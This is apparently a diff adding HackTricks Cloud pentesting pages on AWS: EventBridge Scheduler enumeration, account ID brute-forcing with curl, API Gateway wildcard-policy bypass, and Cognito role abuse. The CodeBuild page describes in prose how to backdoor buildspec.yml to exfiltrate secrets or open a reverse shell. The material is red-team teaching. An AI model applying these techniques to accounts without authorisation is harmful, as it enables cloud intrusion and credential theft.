+++ b/pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md
@@ -0,0 +1,107 @@
+# AWS - EventBridge Scheduler Enum
+
+## EventBridge Scheduler
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## EventBridge Scheduler
+
+**Amazon EventBridge Scheduler** is a fully managed, **serverless scheduler designed to create, run, and manage tasks** at scale. It enables you to schedule millions of tasks across over 270 AWS services and 6,000+ API operations, all from a central service. With built-in reliability and no infrastructure to manage, EventBridge Scheduler simplifies scheduling, reduces maintenance costs, and scales automatically to meet demand. You can configure cron or rate expressions for recurring schedules, set one-time invocations, and define flexible delivery windows with retry options, ensuring tasks are reliably delivered based on the availability of downstream targets.
+
+There is an initial limit of 1,000,000 schedules per region per account. Even the official quotas page suggests, "It's recommended to delete one-time schedules once they've completed."&#x20;
+
+### Types of Schedules
+
+Types of Schedules in EventBridge Scheduler:
+
+1. **One-time schedules** – Execute a task at a specific time, e.g., December 21st at 7 AM UTC.
+2. **Rate-based schedules** – Set recurring tasks based on a frequency, e.g., every 2 hours.
+3. **Cron-based schedules** – Set recurring tasks using a cron expression, e.g., every Friday at 4 PM.
+
+Two Mechanisms for Handling Failed Events:
+
+1. **Retry Policy** – Defines the number of retry attempts for a failed event and how long to keep it unprocessed before considering it a failure.
+2. **Dead-Letter Queue (DLQ)** – A standard Amazon SQS queue where failed events are delivered after retries are exhausted. DLQs help in troubleshooting issues with your schedule or its downstream target.
+
+### Targets
+
+There are 2 types of targets for a scheduler [**templated (docs)**](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-templated.html), which are commonly used and AWS made them easier to configure, and [**universal (docs)**](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-universal.html), which can be used to call any AWS API.
+
+**Templated targets** support the following services:
+
+* CodeBuild – StartBuild
+* CodePipeline – StartPipelineExecution
+* Amazon ECS – RunTask
+  * Parameters: EcsParameters
+* EventBridge – PutEvents
+  * Parameters: EventBridgeParameters
+* Amazon Inspector – StartAssessmentRun
+* Kinesis – PutRecord
+  * Parameters: KinesisParameters
+* Firehose – PutRecord
+* Lambda – Invoke
+* SageMaker – StartPipelineExecution
+  * Parameters: SageMakerPipelineParameters
+* Amazon SNS – Publish
+* Amazon SQS – SendMessage
+  * Parameters: SqsParameters
+* Step Functions – StartExecution
+
+### Enumeration
+
+```bash
+# List all EventBridge Scheduler schedules
+aws scheduler list-schedules
+
+# List all EventBridge Scheduler schedule groups
+aws scheduler list-schedule-groups
+
+# Describe a specific schedule to retrieve more details
+aws scheduler get-schedule --name <schedule_name>
+
+# Describe a specific schedule group
+aws scheduler get-schedule-group --name <group_name>
+
+# List tags for a specific schedule (helpful in identifying any custom tags or permissions)
+aws scheduler list-tags-for-resource --resource-arn <schedule_group_arn>
+```
+
+### Privesc
+
+In the following page, you can check how to **abuse eventbridge scheduler permissions to escalate privileges**:
+
+{% content-ref url="../aws-privilege-escalation/eventbridgescheduler-privesc.md" %}
+[eventbridgescheduler-privesc.md](../aws-privilege-escalation/eventbridgescheduler-privesc.md)
+{% endcontent-ref %}
+
+## References
+
+* [https://docs.aws.amazon.com/scheduler/latest/UserGuide/what-is-scheduler.html](https://docs.aws.amazon.com/scheduler/latest/UserGuide/what-is-scheduler.html)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/README.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/README.md
new file mode 100644
index 0000000000..c999e66cee
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/README.md
@@ -0,0 +1,80 @@
+# AWS - Unauthenticated Enum & Access
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## AWS Credentials Leaks
+
+A common way to obtain access or information about an AWS account is by **searching for leaks**. You can search for leaks using **google dorks**, checking the **public repos** of the **organization** and the **workers** of the organization in **Github** or other platforms, searching in **credentials leaks databases**... or in any other part you think you might find any information about the company and its cloud infa.\
+Some useful **tools**:
+
+* [https://github.com/carlospolop/leakos](https://github.com/carlospolop/leakos)
+* [https://github.com/carlospolop/pastos](https://github.com/carlospolop/pastos)
+* [https://github.com/carlospolop/gorks](https://github.com/carlospolop/gorks)
+
+## AWS Unauthenticated Enum & Access
+
+There are several services in AWS that could be configured giving some kind of access to all Internet or to more people than expected. Check here how:
+
+* [**Accounts Unauthenticated Enum**](aws-accounts-unauthenticated-enum.md)
+* [**Cloud9 Unauthenticated Enum**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/broken-reference/README.md)
+* [**Cloudfront Unauthenticated Enum**](aws-cloudfront-unauthenticated-enum.md)
+* [**Cloudsearch Unauthenticated Enum**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/broken-reference/README.md)
+* [**Cognito Unauthenticated Enum**](aws-cognito-unauthenticated-enum.md)
+* [**DocumentDB Unauthenticated Enum**](aws-documentdb-enum.md)
+* [**EC2 Unauthenticated Enum**](aws-ec2-unauthenticated-enum.md)
+* [**Elasticsearch Unauthenticated Enum**](aws-elasticsearch-unauthenticated-enum.md)
+* [**IAM Unauthenticated Enum**](aws-iam-and-sts-unauthenticated-enum.md)
+* [**IoT Unauthenticated Access**](aws-iot-unauthenticated-enum.md)
+* [**Kinesis Video Unauthenticated Access**](aws-kinesis-video-unauthenticated-enum.md)
+* [**Media Unauthenticated Access**](aws-media-unauthenticated-enum.md)
+* [**MQ Unauthenticated Access**](aws-mq-unauthenticated-enum.md)
+* [**MSK Unauthenticated Access**](aws-msk-unauthenticated-enum.md)
+* [**RDS Unauthenticated Access**](aws-rds-unauthenticated-enum.md)
+* [**Redshift Unauthenticated Access**](aws-redshift-unauthenticated-enum.md)
+* [**SQS Unauthenticated Access**](aws-sqs-unauthenticated-enum.md)
+* [**S3 Unauthenticated Access**](aws-s3-unauthenticated-enum.md)
+
+## Cross Account Attacks
+
+In the talk [**Breaking the Isolation: Cross-Account AWS Vulnerabilities**](https://www.youtube.com/watch?v=JfEFIcpJ2wk) it's presented how some services allow(ed) any AWS account accessing them because **AWS services without specifying accounts ID** were allowed.
+
+During the talk they specify several examples, such as S3 buckets **allowing cloudtrai**l (of **any AWS** account) to **write to them**:
+
+![](<../../../.gitbook/assets/image (260).png>)
+
+Other services found vulnerable:
+
+* AWS Config
+* Serverless repository
+
+## Tools
+
+* [**cloud\_enum**](https://github.com/initstring/cloud_enum): Multi-cloud OSINT tool. **Find public resources** in AWS, Azure, and Google Cloud. Supported AWS services: Open / Protected S3 Buckets, awsapps (WorkMail, WorkDocs, Connect, etc.)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.md
new file mode 100644
index 0000000000..e3a79d5b15
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.md
@@ -0,0 +1,71 @@
+# AWS - Accounts Unauthenticated Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Account IDs
+
+If you have a target there are ways to try to identify account IDs of accounts related to the target.
+
+### Brute-Force
+
+You create a list of potential account IDs and aliases and check them
+
+```bash
+# Check if an account ID exists
+curl -v https://<acount_id>.signin.aws.amazon.com
+## If response is 404 it doesn't, if 200, it exists
+## It also works from account aliases
+curl -v https://vodafone-uk2.signin.aws.amazon.com
+```
+
+You can [automate this process with this tool](https://github.com/dagrz/aws_pwn/blob/master/reconnaissance/validate_accounts.py).
+
+### OSINT
+
+Look for urls that contains `<alias>.signin.aws.amazon.com` with an **alias related to the organization**.
+
+### Marketplace
+
+If a vendor has **instances in the marketplace,** you can get the owner id (account id) of the AWS account he used.
+
+### Snapshots
+
+* Public EBS snapshots (EC2 -> Snapshots -> Public Snapshots)
+* RDS public snapshots (RDS -> Snapshots -> All Public Snapshots)
+* Public AMIs (EC2 -> AMIs -> Public images)
+
+### Errors
+
+Many AWS error messages (even access denied) will give that information.
+
+## References
+
+* [https://www.youtube.com/watch?v=8ZXRw4Ry3mQ](https://www.youtube.com/watch?v=8ZXRw4Ry3mQ)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.md
new file mode 100644
index 0000000000..24abdac6e2
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.md
@@ -0,0 +1,85 @@
+# AWS - API Gateway Unauthenticated Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+### API Invoke bypass
+
+According to the talk [Attack Vectors for APIs Using AWS API Gateway Lambda Authorizers - Alexandre & Leonardo](https://www.youtube.com/watch?v=bsPKk7WDOnE), Lambda Authorizers can be configured **using IAM syntax** to give permissions to invoke API endpoints. This is taken [**from the docs**](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-control-access-using-iam-policies-to-invoke-api.html):
+
+```json
+{
+  "Version": "2012-10-17",
+  "Statement": [
+    {
+      "Effect": "Permission",
+      "Action": [
+        "execute-api:Execution-operation"           
+      ],
+      "Resource": [
+        "arn:aws:execute-api:region:account-id:api-id/stage/METHOD_HTTP_VERB/Resource-path"
+      ]
+    }
+  ]
+} 
+```
+
+The problem with this way to give permissions to invoke endpoints is that the **"\*" implies "anything"** and there is **no more regex syntax supported**.
+
+Some examples:
+
+* A rule such as `arn:aws:execute-apis:sa-east-1:accid:api-id/prod/*/dashboard/*` in order to give each user access to `/dashboard/user/{username}` will give them access to other routes such as `/admin/dashboard/createAdmin` for example.
+
+{% hint style="warning" %}
+Note that **"\*" doesn't stop expanding with slashes**, therefore, if you use "\*" in api-id for example, it could also indicate "any stage" or "any method" as long as the final regex is still valid.\
+So `arn:aws:execute-apis:sa-east-1:accid:*/prod/GET/dashboard/*`\
+Can validate a post request to test stage to the path `/prod/GET/dashboard/admin` for example.
+{% endhint %}
+
+You should always have clear what you want to allow to access and then check if other scenarios are possible with the permissions granted.
+
+For more info, apart of the [**docs**](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-control-access-using-iam-policies-to-invoke-api.html), you can find code to implement authorizers in [**this official aws github**](https://github.com/awslabs/aws-apigateway-lambda-authorizer-blueprints/tree/master/blueprints).
+
+### IAM Policy Injection
+
+In the same [**talk** ](https://www.youtube.com/watch?v=bsPKk7WDOnE)it's exposed the fact that if the code is using **user input** to **generate the IAM policies**, wildcards (and others such as "." or specific strings) can be included in there with the goal of **bypassing restrictions**.
+
+### Public URL template
+
+```
+https://{random_id}.execute-api.{region}.amazonaws.com/{user_provided}
+```
+
+### Get Account ID from public API Gateway URL
+
+Just like with S3 buckets, Data Exchange and Lambda URLs gateways, It's possible to find the account ID of an account abusing the **`aws:ResourceAccount`** **Policy Condition Key** from a public API Gateway URL. This is done by finding the account ID one character at a time abusing wildcards in the **`aws:ResourceAccount`** section of the policy.\
+This technique also allows to get **values of tags** if you know the tag key (there some default interesting ones).
+
+You can find more information in the [**original research**](https://blog.plerion.com/conditional-love-for-aws-metadata-enumeration/) and the tool [**conditional-love**](https://github.com/plerionhq/conditional-love/) to automate this exploitation.
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md
new file mode 100644
index 0000000000..8f553e9b71
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md
@@ -0,0 +1,37 @@
+# AWS - Cloudfront Unauthenticated Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+### Public URL template
+
+```
+https://{random_id}.cloudfront.net
+```
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md
new file mode 100644
index 0000000000..9d42277538
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md
@@ -0,0 +1,61 @@
+# AWS - CodeBuild Unauthenticated Access
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## CodeBuild
+
+For more info check this page:
+
+{% content-ref url="../aws-services/aws-codebuild-enum.md" %}
+[aws-codebuild-enum.md](../aws-services/aws-codebuild-enum.md)
+{% endcontent-ref %}
+
+### buildspec.yml
+
+If you compromise write access over a repository containing a file named **`buildspec.yml`**, you could **backdoor** this file, which specifies the **commands that are going to be executed** inside a CodeBuild project and exfiltrate the secrets, compromise what is done and also compromise the **CodeBuild IAM role credentials**.
+
+Note that even if there isn't any **`buildspec.yml`** file but you know Codebuild is being used (or a different CI/CD) **modifying some legit code** that is going to be executed can also get you a reverse shell for example.
+
+For some related information you could check the page about how to attack Github Actions (similar to this):
+
+{% content-ref url="../../../pentesting-ci-cd/github-security/abusing-github-actions/" %}
+[abusing-github-actions](../../../pentesting-ci-cd/github-security/abusing-github-actions/)
+{% endcontent-ref %}
+
+## Self-hosted GitHub Actions runners in AWS CodeBuild <a href="#action-runner" id="action-runner"></a>
+
+As [**indicated in the docs**](https://docs.aws.amazon.com/codebuild/latest/userguide/action-runner.html), It's possible to configure **CodeBuild** to run **self-hosted Github actions** when a workflow is triggered inside a Github repo configured. This can be detected checking the CodeBuild project configuration because the **`Event type`** needs to contain: **`WORKFLOW_JOB_QUEUED`** and in a Github Workflow because it will select a **self-hosted** runner like this:
+
+```bash
+runs-on: codebuild-<project-name>-${{ github.run_id }}-${{ github.run_attempt }}
+```
+
+This new relationship between Github Actions and AWS creates another way to compromise AWS from Github as the code in Github will be running in a CodeBuild project with an IAM role attached.
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.md
new file mode 100644
index 0000000000..26a18d922f
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.md
@@ -0,0 +1,74 @@
+# AWS - Cognito Unauthenticated Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Unauthenticated Cognito
+
+Cognito is an AWS service that enable developers to **grant their app users access to AWS services**. Developers will grant **IAM roles to authenticated users** in their app (potentially people willbe able to just sign up) and they can also grant an **IAM role to unauthenticated users**.
+
+For basic info about Cognito check:
+
+{% content-ref url="../aws-services/aws-cognito-enum/" %}
+[aws-cognito-enum](../aws-services/aws-cognito-enum/)
+{% endcontent-ref %}
+
+### Identity Pool ID
+
+Identity Pools can grant **IAM roles to unauthenticated users** that just **know the Identity Pool ID** (which is fairly common to **find**), and attacker with this info could try to **access that IAM rol**e and exploit it.\
+Moreoever, IAM roles could also be assigned to **authenticated users** that access the Identity Pool. If an attacker can **register a user** or already has **access to the identity provider** used in the identity pool you could access to the **IAM role being given to authenticated** users and abuse its privileges.
+
+[**Check how to do that here**](../aws-services/aws-cognito-enum/cognito-identity-pools.md).
+
+### User Pool ID
+
